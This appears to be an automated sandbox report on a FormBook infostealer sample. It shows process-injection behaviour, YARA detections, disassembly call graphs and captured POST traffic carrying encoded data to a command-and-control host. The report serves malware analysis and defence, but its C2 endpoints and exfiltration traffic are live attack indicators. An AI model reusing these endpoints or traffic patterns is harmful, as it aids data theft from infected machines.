                                                                                                            Data Ascii: (m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            37192.168.2.950012194.58.112.174806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:57:35.131022930 CEST686OUTPOST /74ou/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.les-massage.online
                                                                                                            Origin: http://www.les-massage.online
                                                                                                            Referer: http://www.les-massage.online/74ou/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 36 6b 4f 73 6f 5a 42 31 59 78 41 76 69 35 43 59 42 47 6c 2b 76 46 50 42 4a 75 73 39 74 4e 43 76 53 4e 58 46 5a 43 63 45 44 52 67 61 54 52 76 52 66 58 6b 35 6e 59 6b 32 61 50 4a 41 52 62 4f 65 38 4e 44 35 74 37 36 4f 6a 70 61 33 4f 48 4e 5a 4d 53 45 2f 2b 67 39 61 48 71 6c 68 53 71 77 39 58 68 48 4d 48 2b 6f 47 2b 38 69 76 59 75 6a 6e 61 63 65 4f 43 66 6d 47 65 68 37 69 39 43 68 38 33 58 47 67 45 45 72 41 63 39 46 35 4f 79 64 68 57 43 6e 50 34 4b 4b 74 78 42 67 55 50 34 45 34 6d 66 47 77 7a 62 33 37 6e 4a 45 74 31 56 6a 73 53 39 66 31 72 36 50 54 71 73 72 54
                                                                                                            Data Ascii: EjLdUJJ=6kOsoZB1YxAvi5CYBGl+vFPBJus9tNCvSNXFZCcEDRgaTRvRfXk5nYk2aPJARbOe8ND5t76Ojpa3OHNZMSE/+g9aHqlhSqw9XhHMH+oG+8ivYujnaceOCfmGeh7i9Ch83XGgEErAc9F5OydhWCnP4KKtxBgUP4E4mfGwzb37nJEt1VjsS9f1r6PTqsrT
                                                                                                            Oct 7, 2024 15:57:35.779932022 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 07 Oct 2024 13:57:35 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 68 0c 20 b4 ec 2a d3 f7 5c c7 53 75 4b d7 d6 f1 a5 2f 02 e5 36 4a 61 34 46 bb 9e 52 98 68 a0 3a 8e 6c 94 a4 eb 96 44 2f 50 1b b9 b8 2c 9e 21 47 91 6f da 61 88 49 26 fd 1d 2c 24 6b bd 21 21 99 ef 99 f8 b3 ba 5c 12 a4 41 28 6c 80 f9 ad 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe [TRUNCATED]
                                                                                                            Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktUh *\SuK/6Ja4FRh:lD/P,!GoaI&,$k!!\A(l+7lC;pQ:V?~KYGoQ 7hgGUW]<ftt0y4JHPad%WAPvTv<6,#mSQd4b~gama+|\|j-"RAqnj4T=E}\DL$x7 ;TJ=mj3h,[J~xA!hv3y?YdnabJ}pAS[FlF#d0S6NmX`j(-dr>\4nz;h`d`=>\(|/4`+!3~b;+&j9Rs4CP-3="i?k;jo,u8X%9W+GohB(O?NN,OmYhI@~jAf4d_"NkPiao#gpPzsp;opt*P9*LEd>=TV'tUq{''b)eM+nw*RB [TRUNCATED]
                                                                                                            Oct 7, 2024 15:57:35.779949903 CEST1236INData Raw: 1a 7d 4f db a7 b3 4e cc 5f a0 59 17 b9 55 d0 75 bc 96 ab 36 22 43 fb 37 26 8c 02 df eb 3e dd 28 e0 64 c0 dd a6 90 f6 2f a0 17 f1 0b ea 7d 1c df 03 ce 78 84 29 ae 9d 75 5f ad 9c 70 d4 d6 26 cf 25 69 fb 60 bd 01 22 a6 a7 30 ee 9f 11 07 ef 27 5f c2
                                                                                                            Data Ascii: }ON_YUu6"C7&>(d/}x)u_p&%i`"0'_E'`&Iu$(Oud4N&Hz_2&Irk>P$G!+b8)o3BknQ.\#9Z/C$bE;`mAi
                                                                                                            Oct 7, 2024 15:57:35.779967070 CEST1236INData Raw: f1 54 56 89 0c f8 9f 44 9e cc 79 a0 2e 1d 93 45 9e 9a a6 10 e3 44 7c 31 20 b3 bd 39 a7 b4 20 3f 0a f1 94 14 14 93 5a 24 d1 9c 22 70 96 5c 38 b2 40 73 a4 c8 e0 f4 47 e0 d1 4f 39 f4 63 af cb 60 87 3c 47 45 fc 0d 77 03 a8 75 de 01 0a af 61 ff 9c 6f
                                                                                                            Data Ascii: TVDy.ED|1 9 ?Z$"p\8@sGO9c`<GEwuao)7xX\`s|d:OYzwq")1=,8bUsO@tFkipj!]:LTa+z90y8cm^Anev;2SzD~QTn=%.(pP}p*Lu
                                                                                                            Oct 7, 2024 15:57:35.779977083 CEST114INData Raw: 7a 25 f7 2a 2c 64 ab 42 2d 8e 1b 36 9d d0 0f b8 88 c7 bd 5e 34 b2 e7 67 41 8c 73 69 67 d0 d5 2f da e6 ae 64 8b 42 98 95 c9 8b b7 6f 74 bc 8d c7 80 3e 1c 0b ef 7b ce ca 76 e8 bb a3 48 ad 08 ba 24 39 6b 9c c1 cf f0 ca 4a 49 48 17 cf a3 c8 11 74 c2
                                                                                                            Data Ascii: z%*,dB-6^4gAsig/dBot>{vH$9kJIHt>0f2{/&3)0


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            38192.168.2.950013194.58.112.17480
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:57:38.297415972 CEST710OUTPOST /74ou/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.les-massage.online
                                                                                                            Origin: http://www.les-massage.online
                                                                                                            Referer: http://www.les-massage.online/74ou/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 36 6b 4f 73 6f 5a 42 31 59 78 41 76 69 61 4b 59 4e 42 78 2b 74 6c 50 41 51 65 73 39 30 39 43 72 53 4e 4c 46 5a 41 77 71 44 44 45 61 53 30 4c 52 65 56 63 35 71 34 6b 32 4f 66 4a 46 65 37 4f 6a 38 4e 4f 4d 74 36 47 4f 6a 71 6d 33 4f 47 39 5a 4d 6c 6f 34 78 51 39 45 49 4b 6c 6a 4e 61 77 39 58 68 48 4d 48 2b 39 64 2b 38 71 76 59 65 54 6e 62 39 65 50 4b 2f 6d 46 5a 68 37 69 72 43 67 33 33 58 47 4f 45 46 6e 6d 63 37 4a 35 4f 7a 74 68 48 32 37 51 79 4b 4b 72 39 52 68 6a 66 36 74 52 71 73 4b 75 78 36 48 42 30 36 70 4f 2f 55 44 79 44 50 57 75 2b 74 50 30 74 4c 69 37 4e 6b 5a 42 45 4c 69 51 63 7a 65 31 46 53 59 74 50 77 4b 38 59 51 3d 3d
                                                                                                            Data Ascii: EjLdUJJ=6kOsoZB1YxAviaKYNBx+tlPAQes909CrSNLFZAwqDDEaS0LReVc5q4k2OfJFe7Oj8NOMt6GOjqm3OG9ZMlo4xQ9EIKljNaw9XhHMH+9d+8qvYeTnb9ePK/mFZh7irCg33XGOEFnmc7J5OzthH27QyKKr9Rhjf6tRqsKux6HB06pO/UDyDPWu+tP0tLi7NkZBELiQcze1FSYtPwK8YQ==
                                                                                                            Oct 7, 2024 15:57:38.948949099 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 07 Oct 2024 13:57:38 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 68 0c 20 b4 ec 2a d3 f7 5c c7 53 75 4b d7 d6 f1 a5 2f 02 e5 36 4a 61 34 46 bb 9e 52 98 68 a0 3a 8e 6c 94 a4 eb 96 44 2f 50 1b b9 b8 2c 9e 21 47 91 6f da 61 88 49 26 fd 1d 2c 24 6b bd 21 21 99 ef 99 f8 b3 ba 5c 12 a4 41 28 6c 80 f9 ad 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe [TRUNCATED]
                                                                                                            Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktUh *\SuK/6Ja4FRh:lD/P,!GoaI&,$k!!\A(l+7lC;pQ:V?~KYGoQ 7hgGUW]<ftt0y4JHPad%WAPvTv<6,#mSQd4b~gama+|\|j-"RAqnj4T=E}\DL$x7 ;TJ=mj3h,[J~xA!hv3y?YdnabJ}pAS[FlF#d0S6NmX`j(-dr>\4nz;h`d`=>\(|/4`+!3~b;+&j9Rs4CP-3="i?k;jo,u8X%9W+GohB(O?NN,OmYhI@~jAf4d_"NkPiao#gpPzsp;opt*P9*LEd>=TV'tUq{''b)eM+nw*RB [TRUNCATED]
                                                                                                            Oct 7, 2024 15:57:38.948972940 CEST1236INData Raw: 1a 7d 4f db a7 b3 4e cc 5f a0 59 17 b9 55 d0 75 bc 96 ab 36 22 43 fb 37 26 8c 02 df eb 3e dd 28 e0 64 c0 dd a6 90 f6 2f a0 17 f1 0b ea 7d 1c df 03 ce 78 84 29 ae 9d 75 5f ad 9c 70 d4 d6 26 cf 25 69 fb 60 bd 01 22 a6 a7 30 ee 9f 11 07 ef 27 5f c2
                                                                                                            Data Ascii: }ON_YUu6"C7&>(d/}x)u_p&%i`"0'_E'`&Iu$(Oud4N&Hz_2&Irk>P$G!+b8)o3BknQ.\#9Z/C$bE;`mAi
                                                                                                            Oct 7, 2024 15:57:38.948985100 CEST1236INData Raw: f1 54 56 89 0c f8 9f 44 9e cc 79 a0 2e 1d 93 45 9e 9a a6 10 e3 44 7c 31 20 b3 bd 39 a7 b4 20 3f 0a f1 94 14 14 93 5a 24 d1 9c 22 70 96 5c 38 b2 40 73 a4 c8 e0 f4 47 e0 d1 4f 39 f4 63 af cb 60 87 3c 47 45 fc 0d 77 03 a8 75 de 01 0a af 61 ff 9c 6f
                                                                                                            Data Ascii: TVDy.ED|1 9 ?Z$"p\8@sGO9c`<GEwuao)7xX\`s|d:OYzwq")1=,8bUsO@tFkipj!]:LTa+z90y8cm^Anev;2SzD~QTn=%.(pP}p*Lu
                                                                                                            Oct 7, 2024 15:57:38.949013948 CEST114INData Raw: 7a 25 f7 2a 2c 64 ab 42 2d 8e 1b 36 9d d0 0f b8 88 c7 bd 5e 34 b2 e7 67 41 8c 73 69 67 d0 d5 2f da e6 ae 64 8b 42 98 95 c9 8b b7 6f 74 bc 8d c7 80 3e 1c 0b ef 7b ce ca 76 e8 bb a3 48 ad 08 ba 24 39 6b 9c c1 cf f0 ca 4a 49 48 17 cf a3 c8 11 74 c2
                                                                                                            Data Ascii: z%*,dB-6^4gAsig/dBot>{vH$9kJIHt>0f2{/&3)0


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:09:54:30
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Users\user\Desktop\YSjOEAta07.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\YSjOEAta07.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'361'945 bytes
                                                                                                            MD5 hash:EB0F7C655C78976889355AA35A43DD38
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:2
                                                                                                            Start time:09:54:36
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\YSjOEAta07.exe"
                                                                                                            Imagebase:0x620000
                                                                                                            File size:46'504 bytes
                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:09:54:39
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe"
                                                                                                            Imagebase:0x2b0000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:09:54:41
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\replace.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\replace.exe"
                                                                                                            Imagebase:0xc00000
                                                                                                            File size:18'944 bytes
                                                                                                            MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:09:54:54
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe"
                                                                                                            Imagebase:0x2b0000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:09:55:06
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff73feb0000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.4%
                                                                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                                                                              Signature Coverage:8.3%
                                                                                                              Total number of Nodes:132
                                                                                                              Total number of Limit Nodes:10
                                                                                                              execution_graph 78491 424c03 78496 424c1c 78491->78496 78492 424cac 78493 424c67 78499 42e583 78493->78499 78496->78492 78496->78493 78497 424ca7 78496->78497 78498 42e583 RtlFreeHeap 78497->78498 78498->78492 78502 42c7c3 78499->78502 78501 424c77 78503 42c7dd 78502->78503 78504 42c7ee RtlFreeHeap 78503->78504 78504->78501 78505 42ba83 78506 42ba9d 78505->78506 78509 3b72df0 LdrInitializeThunk 78506->78509 78507 42bac5 78509->78507 78510 429913 78511 429978 78510->78511 78512 4299ab 78511->78512 78515 4138f3 78511->78515 78514 42998d 78519 4138c2 78515->78519 78517 41399a 78517->78514 78519->78517 78520 42c6e3 78519->78520 78521 42c700 78520->78521 78524 3b72c70 LdrInitializeThunk 78521->78524 78522 4138d5 78522->78514 78524->78522 78633 42e663 78636 42c773 78633->78636 78635 42e67e 78637 42c78d 78636->78637 78638 42c79e RtlAllocateHeap 78637->78638 78638->78635 78639 42f7a3 78640 42e583 RtlFreeHeap 78639->78640 78641 42f7b8 78640->78641 78642 424873 78643 42488f 78642->78643 78644 4248b7 78643->78644 78645 4248cb 78643->78645 78647 42c473 NtClose 78644->78647 78646 42c473 NtClose 78645->78646 78648 4248d4 78646->78648 78649 4248c0 78647->78649 78652 42e6a3 RtlAllocateHeap 78648->78652 78651 4248df 78652->78651 78525 41b153 78526 41b197 78525->78526 78528 41b1b8 78526->78528 78529 42c473 78526->78529 78530 42c490 78529->78530 78531 42c4a1 NtClose 78530->78531 78531->78528 78532 413e13 78533 413e2d 78532->78533 78535 413e4b 78533->78535 78538 4175e3 78533->78538 78536 413e90 78535->78536 78537 413e7f PostThreadMessageW 78535->78537 78537->78536 78539 417607 78538->78539 78540 41760e 78539->78540 78541 417643 LdrLoadDll 78539->78541 78540->78535 78541->78540 78653 413b33 78655 413b59 78653->78655 78654 413b83 78655->78654 78657 4138b3 LdrInitializeThunk 78655->78657 78657->78654 78542 3b72b60 LdrInitializeThunk 78543 418b98 78544 42c473 NtClose 78543->78544 78545 418ba2 78544->78545 78546 401a5b 78547 401a60 78546->78547 78550 42fc13 78547->78550 78553 42e0f3 78550->78553 78554 42e136 78553->78554 78565 407513 78554->78565 78556 42e14c 78564 401afa 78556->78564 78568 41af63 78556->78568 78558 42e16b 78559 42e180 78558->78559 78583 42c813 78558->78583 78579 428173 78559->78579 78562 42e19a 78563 42c813 ExitProcess 78562->78563 78563->78564 78586 416293 78565->78586 78567 407520 78567->78556 78569 41af8f 78568->78569 78608 41ae53 78569->78608 78572 41afd4 78574 41aff0 78572->78574 78577 42c473 NtClose 78572->78577 78573 41afbc 78575 41afc7 78573->78575 78576 42c473 NtClose 78573->78576 78574->78558 78575->78558 78576->78575 78578 41afe6 78577->78578 78578->78558 78581 4281d5 78579->78581 78580 4281e2 78580->78562 78581->78580 78619 418453 78581->78619 78584 42c830 78583->78584 78585 42c841 ExitProcess 78584->78585 78585->78559 78588 4162b0 78586->78588 78587 4162c9 78587->78567 78588->78587 78593 42ceb3 78588->78593 78590 416327 78590->78587 78600 428e93 NtClose LdrInitializeThunk 78590->78600 78592 416381 78592->78567 78595 42cecd 78593->78595 78594 42cefc 78594->78590 78595->78594 78601 42bad3 78595->78601 78598 42e583 RtlFreeHeap 78599 42cf75 78598->78599 78599->78590 78600->78592 78602 42baf0 78601->78602 78605 3b72c0a 78602->78605 78603 42bb1c 78603->78598 78606 3b72c11 78605->78606 78607 3b72c1f LdrInitializeThunk 78605->78607 78606->78603 78607->78603 78609 41ae6d 78608->78609 78613 41af49 78608->78613 78614 42bb73 78609->78614 78612 42c473 NtClose 78612->78613 78613->78572 78613->78573 78615 42bb8d 78614->78615 78618 3b735c0 LdrInitializeThunk 78615->78618 78616 41af3d 78616->78612 78618->78616 78621 41847d 78619->78621 78620 41897b 78620->78580 78621->78620 78627 413a93 78621->78627 78623 41859e 78623->78620 78624 42e583 RtlFreeHeap 78623->78624 78625 4185b6 78624->78625 78625->78620 78626 42c813 ExitProcess 78625->78626 78626->78620 78629 413ab3 78627->78629 78630 413b1c 78629->78630 78632 41b273 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 78629->78632 78630->78623 78631 413b12 78631->78623 78632->78631

                                                                                                              Executed Functions

                                                                                                              Function 00418453 Relevance: 1.7, Strings: 1, Instructions: 436COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 306 418453-4184c7 call 42e623 * 3 call 404b83 call 424203 317 418986-41898a 306->317 318 4184cd-4184f7 call 42e5d3 306->318 321 418502 318->321 322 4184f9-418500 318->322 323 418504-41850e 321->323 322->323 324 418510 323->324 325 41852f-418541 call 424233 323->325 326 418513-418516 324->326 332 418984-418985 325->332 333 418547-41855f call 42df43 325->333 328 418518-41851b 326->328 329 41851f-418529 326->329 328->326 331 41851d 328->331 329->325 331->325 332->317 333->332 336 418565-4185a9 call 413a93 333->336 336->332 339 4185af-4185cf call 42e583 336->339 342 4185d1-4185d3 339->342 343 418600-418602 339->343 344 4185d5-4185e3 call 42dab3 call 407053 342->344 345 41860b-41862d call 41b003 342->345 343->345 346 418604 343->346 354 4185e8-4185ed 344->354 345->332 351 418633-418655 call 42bca3 345->351 346->345 355 41865a-41865f 351->355 354->343 356 4185ef-4185fe 354->356 355->332 357 418665-4186dc call 42b663 call 42b703 call 42e5d3 355->357 356->357 364 4186e5 357->364 365 4186de-4186e3 357->365 366 4186e7-418717 364->366 365->366 367 41871d 366->367 368 4187ff 366->368 369 418723-418729 367->369 370 418801 368->370 371 41872b-41872e 369->371 372 41873a-41875b call 42e5d3 369->372 373 418808-41880c 370->373 371->369 375 418730-418735 371->375 380 418767 372->380 381 41875d-418765 372->381 376 418812-418816 373->376 377 41880e-418810 373->377 375->370 376->373 377->376 379 418818-41882c 377->379 382 418899-4188e9 call 417563 * 2 call 42e5a3 379->382 383 41882e-418831 379->383 384 41876a-41877f 380->384 381->384 414 4188eb-4188ef 382->414 415 41890e-418913 382->415 386 418834-418839 383->386 387 418781 384->387 388 418792-4187d3 call 4174e3 call 42e5d3 384->388 390 418850-418854 386->390 391 41883b-41883e 386->391 393 418784-418787 387->393 412 4187d5-4187da 388->412 413 4187dc 388->413 390->386 392 418856-418858 390->392 391->390 396 418840-418842 391->396 392->382 398 41885a-418863 392->398 399 418790 393->399 400 418789-41878c 393->400 396->390 397 418844-418847 396->397 397->390 405 418849 397->405 406 418865-418868 398->406 399->388 400->393 407 41878e 400->407 405->390 410 418893-418897 406->410 411 41886a-41886d 406->411 407->388 410->382 410->406 411->410 416 41886f-418871 411->416 417 4187de-4187fd call 4149d3 412->417 413->417 418 4188f1-418902 call 4070c3 414->418 419 41891b-418925 call 42b863 414->419 415->419 420 418915 415->420 416->410 421 418873-418876 416->421 417->370 426 418907-41890c 418->426 428 41892a-41892d 419->428 420->419 421->410 425 418878-418891 421->425 425->410 426->415 429 418933-418948 call 41b1d3 426->429 428->429 432 41894a-418976 call 4174e3 * 2 call 42c813 429->432 438 41897b-41897e 432->438 438->332
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
